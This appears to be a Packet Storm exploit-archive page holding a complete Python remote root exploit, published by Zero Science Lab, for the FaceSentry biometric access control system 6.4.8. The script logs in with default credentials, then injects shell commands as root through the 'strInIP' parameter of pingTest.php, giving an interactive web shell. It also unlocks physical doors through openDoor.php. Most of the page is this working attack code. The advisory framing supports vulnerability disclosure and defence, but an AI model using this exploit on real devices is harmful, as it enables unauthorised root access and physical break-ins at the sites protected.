exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

FaceSentry Access Control System 6.4.8 Remote Root

FaceSentry Access Control System 6.4.8 Remote Root
Posted Jul 1, 2019
Authored by LiquidWorm | Site zeroscience.mk

FaceSentry Access Control System version 6.4.8 suffers from an authenticated OS command injection vulnerability using default credentials. This can be exploited to inject and execute arbitrary shell commands as the root user via the 'strInIP' POST parameter in pingTest PHP script.

tags | exploit, arbitrary, shell, root, php
SHA-256 | 7a3abbb69e71f4b2ad4bed9168fdb0b732576793139ab141b74613a6a5b92caf

FaceSentry Access Control System 6.4.8 Remote Root

Change Mirror Download
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
#
# FaceSentry Access Control System 6.4.8 Remote Root Exploit
#
#
# Vendor: iWT Ltd.
# Product web page: http://www.iwt.com.hk
# Affected version: Firmware 6.4.8 build 264 (Algorithm A16)
# Firmware 5.7.2 build 568 (Algorithm A14)
# Firmware 5.7.0 build 539 (Algorithm A14)
#
# Summary: FaceSentry 5AN is a revolutionary smart identity
# management appliance that offers entry via biometric face
# identification, contactless smart card, staff ID, or QR-code.
# The QR-code upgrade allows you to share an eKey with guests
# while you're away from your Office and monitor all activity
# via the web administration tool. Powered by standard PoE
# (Power over Ethernet), FaceSEntry 5AN can be installed in
# minutes with only 6 screws. FaceSentry 5AN is a true enterprise
# grade access control or time-and-attendance appliance.
#
# Desc: FaceSentry suffers from an authenticated OS command
# injection vulnerability using default credentials. This can
# be exploited to inject and execute arbitrary shell commands
# as the root user via the 'strInIP' POST parameter in pingTest
# PHP script.
#
# ==============================================================
# /pingTest.php:
# --------------
# 8: if (!isAuth('TestTools','R')){
# 9: echo "No Permission";
# 10: include("footer.php");
# 11: exit;
# 12: }
# 13:
# 14: if(isset($_POST["strInIP"])){
# 15: $strInIP = $_POST["strInIP"];
# 16: }else{
# 17: $strInIP = "";
# 18: }
# 19:
# 20: $strOperationResult = "";
# 21: if ($strInIP != ""){
# 22:
# 23: $out = array();
# 24: exec("sudo ping -c 4 $strInIP",$out);
# 25: $result = "";
# 26: foreach($out as $line){
# 27: $result = $result.$line."<br>";
# 28: }
# ==============================================================
#
# Tested on: Linux 4.14.18-sunxi (armv7l) Ubuntu 16.04.4 LTS (Xenial Xerus)
# Linux 3.4.113-sun8i (armv7l)
# PHP/7.0.30-0ubuntu0.16.04.1
# PHP/7.0.22-0ubuntu0.16.04.1
# lighttpd/1.4.35
# Armbian 5.38
# Sunxi Linux (sun8i generation)
# Orange Pi PC +
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# @zeroscience
#
#
# Advisory ID: ZSL-2019-5525
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5525.php
#
#
# 28.05.2019
#

import datetime########INITIALIZE
import urllib2#########BIOMETRICS
import urllib##########FACIAL.REC
import time############OGNITION.S
import sys##(.)###(.)##YSTEM.DOOR
import re#######O######UNLOCKED.A
import os#######_######CCESS.GRAN
import io######(_)#####TED.0B1000
import py##############1.11111011

from cookielib import CookieJar

global pajton
pajton = os.path.basename(sys.argv[0])

def usage():
if len(sys.argv) < 2:
print '[+] Usage: ./' + pajton + ' <ip>\n'
sys.exit()

def auth():
brojac = 0
usernames = [ 'admin', 'user', 'administrator' ] # case sensitive
passwords = [ '123', '123', '123456' ]
while brojac < 3:
podatoci = { 'strInLogin' : usernames[brojac],
'strInPassword' : passwords[brojac],
'saveLogin' : '1',
'saveFor' : '168' } # 7 days
print '[+] Trying creds ' + usernames[brojac] + ':' + passwords[brojac]
nesto_encode = urllib.urlencode(podatoci)
ajde.open('http://' + target + '/login.php', nesto_encode)
check = ajde.open('http://' + target + '/sentryInfo.php')
dool = re.search(r'Hardware Key', check.read())
if dool:
print '[+] That worked!'
break
else:
brojac += 1
if brojac == 3:
print '[!] Ah ah ah. You didn\'t say the magic word!'
sys.exit()

def door():
unlock = raw_input('[*] Unlock door No.: ') # default door number = 0
try:
br = int(unlock)
panel = { 'strInAction' : 'openDoor',
'strInPanelNo' : br,
'strInRestartAction' : '',
'strPanelIDRestart' : '',
'strPanelRestartAction' : '' }
nesto_encode = urllib.urlencode(panel)
ajde.open('http://' + target + '/openDoor.php', nesto_encode)
print '[+] Door ' + unlock + ' is unlocked!'
except ValueError:
print '[!] Only values from 0 to 8 are valid.'
door()

def main():
if os.name == 'posix':
os.system('clear')
if os.name == 'nt':
os.system('cls')

vremetodeneska = datetime.datetime.now()
kd = vremetodeneska.strftime('%d.%m.%Y %H:%M:%S')
print 'Starting exploit at ' + kd

print '''
──────────────────────────────────
──FaceSentry Access Control System
────────Remote Root Exploit
─────────Zero Science Lab
────────www.zeroscience.mk
───────────ZSL-2019-5525
─────────────▄▄▄▄▄▄▄▄▄
─────────────▌▐░▀░▀░▀▐
─────────────▌░▌░░░░░▐
─────────────▌░░░░░░░▐
─────────────▄▄▄▄▄▄▄▄▄
───────▄▀▀▀▀▀▌▄█▄░▄█▄▐▀▀▀▀▀▄
──────█▒▒▒▒▒▐░░░░▄░░░░▌▒▒▒▒▒█
─────▐▒▒▒▒▒▒▒▌░░░░░░░▐▒▒▒▒▒▒▒▌
─────▐▒▒▒▒▒▒▒█░▀▀▀▀▀░█▒▒▒▒▒▒▒▌
─────▐▒▒▒▒▒▒▒▒█▄▄▄▄▄█▒▒▒▒▒▒▒▒▌
─────▐▒▒▒▒▐▒▒▒▒▒▒▒▒▒▒▒▒▐▒▒▒▒▒▌
─────▐▒▒▒▒▒█▒▒▒▒▒▒▒▒▒▒▒█▒▒▒▒▒▌
─────▐▒▒▒▒▒▐▒▒▒▒▒▒▒▒▒▒▒▌▒▒▒▒▒▌
─────▐▒▒▒▒▒▒▌▒▒▒▒▒▒▒▒▒▐▒▒▒▒▒▒▌
─────▐▒▒▒▒▒▒▌▄▄▄▄▄▄▄▄▄▐▒▒▒▒▒▒▌
─────▐▄▄▄▄▄▄▌▌███████▌▐▄▄▄▄▄▄▌
──────█▀▀▀▀█─▌███▌███▌─█▀▀▀▀█
──────▐░░░░▌─▌███▌███▌─▐░░░░▌
───────▀▀▀▀──▌███▌███▌──▀▀▀▀
─────────────▌███▌███▌
─────────────▌███▌███▌
───────────▐▀▀▀██▌█▀▀▀▌
▒▒▒▒▒▒▒▒▒▒▒▐▄▄▄▄▄▄▄▄▄▄▌▒▒▒▒▒▒▒▒▒▒▒
'''

usage()
tegla = CookieJar()
global ajde, target
target = sys.argv[1]
ajde = urllib2.build_opener(urllib2.HTTPCookieProcessor(tegla))
auth()
raw_input('\n[*] Press [ENTER] to land... ')

print '[+] Entering interactive (web)shell...'
time.sleep(1)
print

while True:
try:
cmd = raw_input('root@facesentry:~# ')
if 'exit' in cmd.strip():
print '[+] Take care now, bye bye then!'
break
if 'door' in cmd.strip():
door()
continue
podatoci = { 'strInIP' : ';sudo ' + cmd } # |cmd
nesto_encode = urllib.urlencode(podatoci)
r_izraz = ajde.open('http://' + target + '/pingTest.php?', nesto_encode)
pattern = re.search(cmd+'\)<[^>]*>(.*?)</font>', r_izraz.read())
x = pattern.groups()[0].strip()
y = x.replace('<br>', '\n')
print y.strip()
except Exception as i:
print '[-] Error: ' + i.message
pass
except KeyboardInterrupt as k:
print '\n[+] Interrupter!'
sys.exit()

sys.exit()

if __name__ == "__main__":
main()
Login or Register to add favorites

File Archive:

September 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    261 Files
  • 2
    Sep 2nd
    17 Files
  • 3
    Sep 3rd
    0 Files
  • 4
    Sep 4th
    0 Files
  • 5
    Sep 5th
    0 Files
  • 6
    Sep 6th
    0 Files
  • 7
    Sep 7th
    0 Files
  • 8
    Sep 8th
    0 Files
  • 9
    Sep 9th
    0 Files
  • 10
    Sep 10th
    0 Files
  • 11
    Sep 11th
    0 Files
  • 12
    Sep 12th
    0 Files
  • 13
    Sep 13th
    0 Files
  • 14
    Sep 14th
    0 Files
  • 15
    Sep 15th
    0 Files
  • 16
    Sep 16th
    0 Files
  • 17
    Sep 17th
    0 Files
  • 18
    Sep 18th
    0 Files
  • 19
    Sep 19th
    0 Files
  • 20
    Sep 20th
    0 Files
  • 21
    Sep 21st
    0 Files
  • 22
    Sep 22nd
    0 Files
  • 23
    Sep 23rd
    0 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close